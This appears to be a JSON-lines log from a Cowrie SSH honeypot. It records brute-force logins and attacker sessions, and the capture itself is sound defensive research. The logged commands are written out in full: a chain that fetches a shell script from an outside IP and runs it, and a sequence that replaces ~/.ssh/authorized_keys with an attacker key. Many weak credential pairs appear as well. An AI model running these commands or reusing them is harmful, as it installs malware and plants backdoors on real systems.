{"eventid":"cowrie.command.input","input":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://160.187.246.23/all.sh || curl -O http://160.187.246.23/all.sh || busybox wget http://160.187.246.23/all.sh || busybox tftp 160.187.246.23 -c get all.sh || busybox tftp -r all.sh -g 160.187.246.23 -l all.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh || tftp 160.187.246.23 -c get all.sh || tftp -r all.sh -g 160.187.246.23 -l all.sh || ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh;chmod 777 all.sh;sh ./all.sh;rm -rf all.sh","message":"CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://160.187.246.23/all.sh || curl -O http://160.187.246.23/all.sh || busybox wget http://160.187.246.23/all.sh || busybox tftp 160.187.246.23 -c get all.sh || busybox tftp -r all.sh -g 160.187.246.23 -l all.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh || tftp 160.187.246.23 -c get all.sh || tftp -r all.sh -g 160.187.246.23 -l all.sh || ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh;chmod 777 all.sh;sh ./all.sh;rm -rf all.sh","sensor":"my-vps","timestamp":"2025-09-09T06:38:56.331031Z","src_ip":"212.227.235.229","session":"1b40944452a0"}
{"eventid":"cowrie.session.file_download","url":"http://160.187.246.23/all.sh","outfile":"var/lib/cowrie/downloads/6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","shasum":"6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","sensor":"my-vps","timestamp":"2025-09-09T06:38:56.891240Z","message":"Downloaded URL (http://160.187.246.23/all.sh) with SHA-256 6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43 to var/lib/cowrie/downloads/6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","src_ip":"212.227.235.229","session":"1b40944452a0"}
{"eventid":"cowrie.session.file_download","url":"http://160.187.246.23/all.sh","outfile":"var/lib/cowrie/downloads/6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","shasum":"6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","sensor":"my-vps","timestamp":"2025-09-09T06:38:57.192859Z","message":"Downloaded URL (http://160.187.246.23/all.sh) with SHA-256 6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43 to var/lib/cowrie/downloads/6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","src_ip":"212.227.235.229","session":"1b40944452a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d200d731f57558f49a89e4061eda2a513b27639047f8700510feda1c5e2e93e1","size":1890,"shasum":"d200d731f57558f49a89e4061eda2a513b27639047f8700510feda1c5e2e93e1","duplicate":true,"duration":"3.9","message":"Closing TTY Log: var/lib/cowrie/tty/d200d731f57558f49a89e4061eda2a513b27639047f8700510feda1c5e2e93e1 after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:38:57.310010Z","src_ip":"212.227.235.229","session":"1b40944452a0"}
{"eventid":"cowrie.session.closed","duration":4.579209089279175,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:38:57.310736Z","src_ip":"212.227.235.229","session":"1b40944452a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55915,"dst_ip":"1.2.3.4","dst_port":22,"session":"c90e364ad00c","protocol":"ssh","message":"New connection: 212.227.235.229:55915 (1.2.3.4:22) [session: c90e364ad00c]","sensor":"my-vps","timestamp":"2025-09-09T06:39:26.800232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:39:26.802939Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:39:26.917235Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@1234","message":"login attempt [root/Test@1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:39:27.391666Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:39:27.699862Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:39:27.701091Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:39:27.701833Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:39:27.818280Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:39:28.124992Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:39:28.127246Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:39:28.253760Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:39:28.256333Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57486,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bb6e1db5c06","protocol":"ssh","message":"New connection: 212.227.235.229:57486 (1.2.3.4:22) [session: 8bb6e1db5c06]","sensor":"my-vps","timestamp":"2025-09-09T06:39:28.367672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:39:28.370542Z","src_ip":"212.227.235.229","session":"8bb6e1db5c06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:39:28.484441Z","src_ip":"212.227.235.229","session":"8bb6e1db5c06"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:39:28.945988Z","src_ip":"212.227.235.229","session":"8bb6e1db5c06"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:39:30.062954Z","src_ip":"212.227.235.229","session":"8bb6e1db5c06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63757,"dst_ip":"1.2.3.4","dst_port":22,"session":"18f940d95c79","protocol":"ssh","message":"New connection: 212.227.235.229:63757 (1.2.3.4:22) [session: 18f940d95c79]","sensor":"my-vps","timestamp":"2025-09-09T06:39:30.178895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:39:30.179873Z","src_ip":"212.227.235.229","session":"18f940d95c79"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:39:30.293736Z","src_ip":"212.227.235.229","session":"18f940d95c79"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:39:30.794848Z","src_ip":"212.227.235.229","session":"18f940d95c79"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:39:30.911733Z","src_ip":"212.227.235.229","session":"18f940d95c79"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:39:30.912657Z","src_ip":"212.227.235.229","session":"c90e364ad00c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:39:37.292549Z","src_ip":"212.227.235.229","session":"c7382494bbee"}
{"eventid":"cowrie.session.closed","duration":180.2676887512207,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:39:37.297473Z","src_ip":"212.227.235.229","session":"c7382494bbee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45335,"dst_ip":"1.2.3.4","dst_port":22,"session":"353746c5c445","protocol":"ssh","message":"New connection: 212.227.235.229:45335 (1.2.3.4:22) [session: 353746c5c445]","sensor":"my-vps","timestamp":"2025-09-09T06:39:46.746270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:39:46.747168Z","src_ip":"212.227.235.229","session":"353746c5c445"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:39:46.990251Z","src_ip":"212.227.235.229","session":"353746c5c445"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":57232,"dst_ip":"1.2.3.4","dst_port":22,"session":"9392e2d51568","protocol":"ssh","message":"New connection: 157.20.207.165:57232 (1.2.3.4:22) [session: 9392e2d51568]","sensor":"my-vps","timestamp":"2025-09-09T06:39:48.172289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:39:48.173096Z","src_ip":"157.20.207.165","session":"9392e2d51568"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:39:48.356621Z","src_ip":"157.20.207.165","session":"9392e2d51568"}
{"eventid":"cowrie.login.failed","username":"db","password":"123456789","message":"login attempt [db/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T06:39:48.572464Z","src_ip":"212.227.235.229","session":"353746c5c445"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123","message":"login attempt [sonar/123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:39:49.129510Z","src_ip":"157.20.207.165","session":"9392e2d51568"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:39:49.816409Z","src_ip":"212.227.235.229","session":"353746c5c445"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:39:50.315212Z","src_ip":"157.20.207.165","session":"9392e2d51568"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":56390,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bd8901add78","protocol":"ssh","message":"New connection: 92.118.39.62:56390 (1.2.3.4:22) [session: 5bd8901add78]","sensor":"my-vps","timestamp":"2025-09-09T06:40:01.874717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:40:01.875827Z","src_ip":"92.118.39.62","session":"5bd8901add78"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:40:01.906573Z","src_ip":"92.118.39.62","session":"5bd8901add78"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos123456","message":"login attempt [centos/centos123456] failed","sensor":"my-vps","timestamp":"2025-09-09T06:40:02.002409Z","src_ip":"92.118.39.62","session":"5bd8901add78"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:40:03.036212Z","src_ip":"92.118.39.62","session":"5bd8901add78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40769,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0f11f55c984","protocol":"ssh","message":"New connection: 212.227.235.229:40769 (1.2.3.4:22) [session: e0f11f55c984]","sensor":"my-vps","timestamp":"2025-09-09T06:40:06.819245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:40:06.820244Z","src_ip":"212.227.235.229","session":"e0f11f55c984"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:40:06.905617Z","src_ip":"212.227.235.229","session":"e0f11f55c984"}
{"eventid":"cowrie.login.failed","username":"reza","password":"reza@123","message":"login attempt [reza/reza@123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:40:07.288939Z","src_ip":"212.227.235.229","session":"e0f11f55c984"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:40:08.376664Z","src_ip":"212.227.235.229","session":"e0f11f55c984"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":54834,"dst_ip":"1.2.3.4","dst_port":22,"session":"f992ac39357b","protocol":"ssh","message":"New connection: 118.26.39.178:54834 (1.2.3.4:22) [session: f992ac39357b]","sensor":"my-vps","timestamp":"2025-09-09T06:40:08.788306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:40:08.788975Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext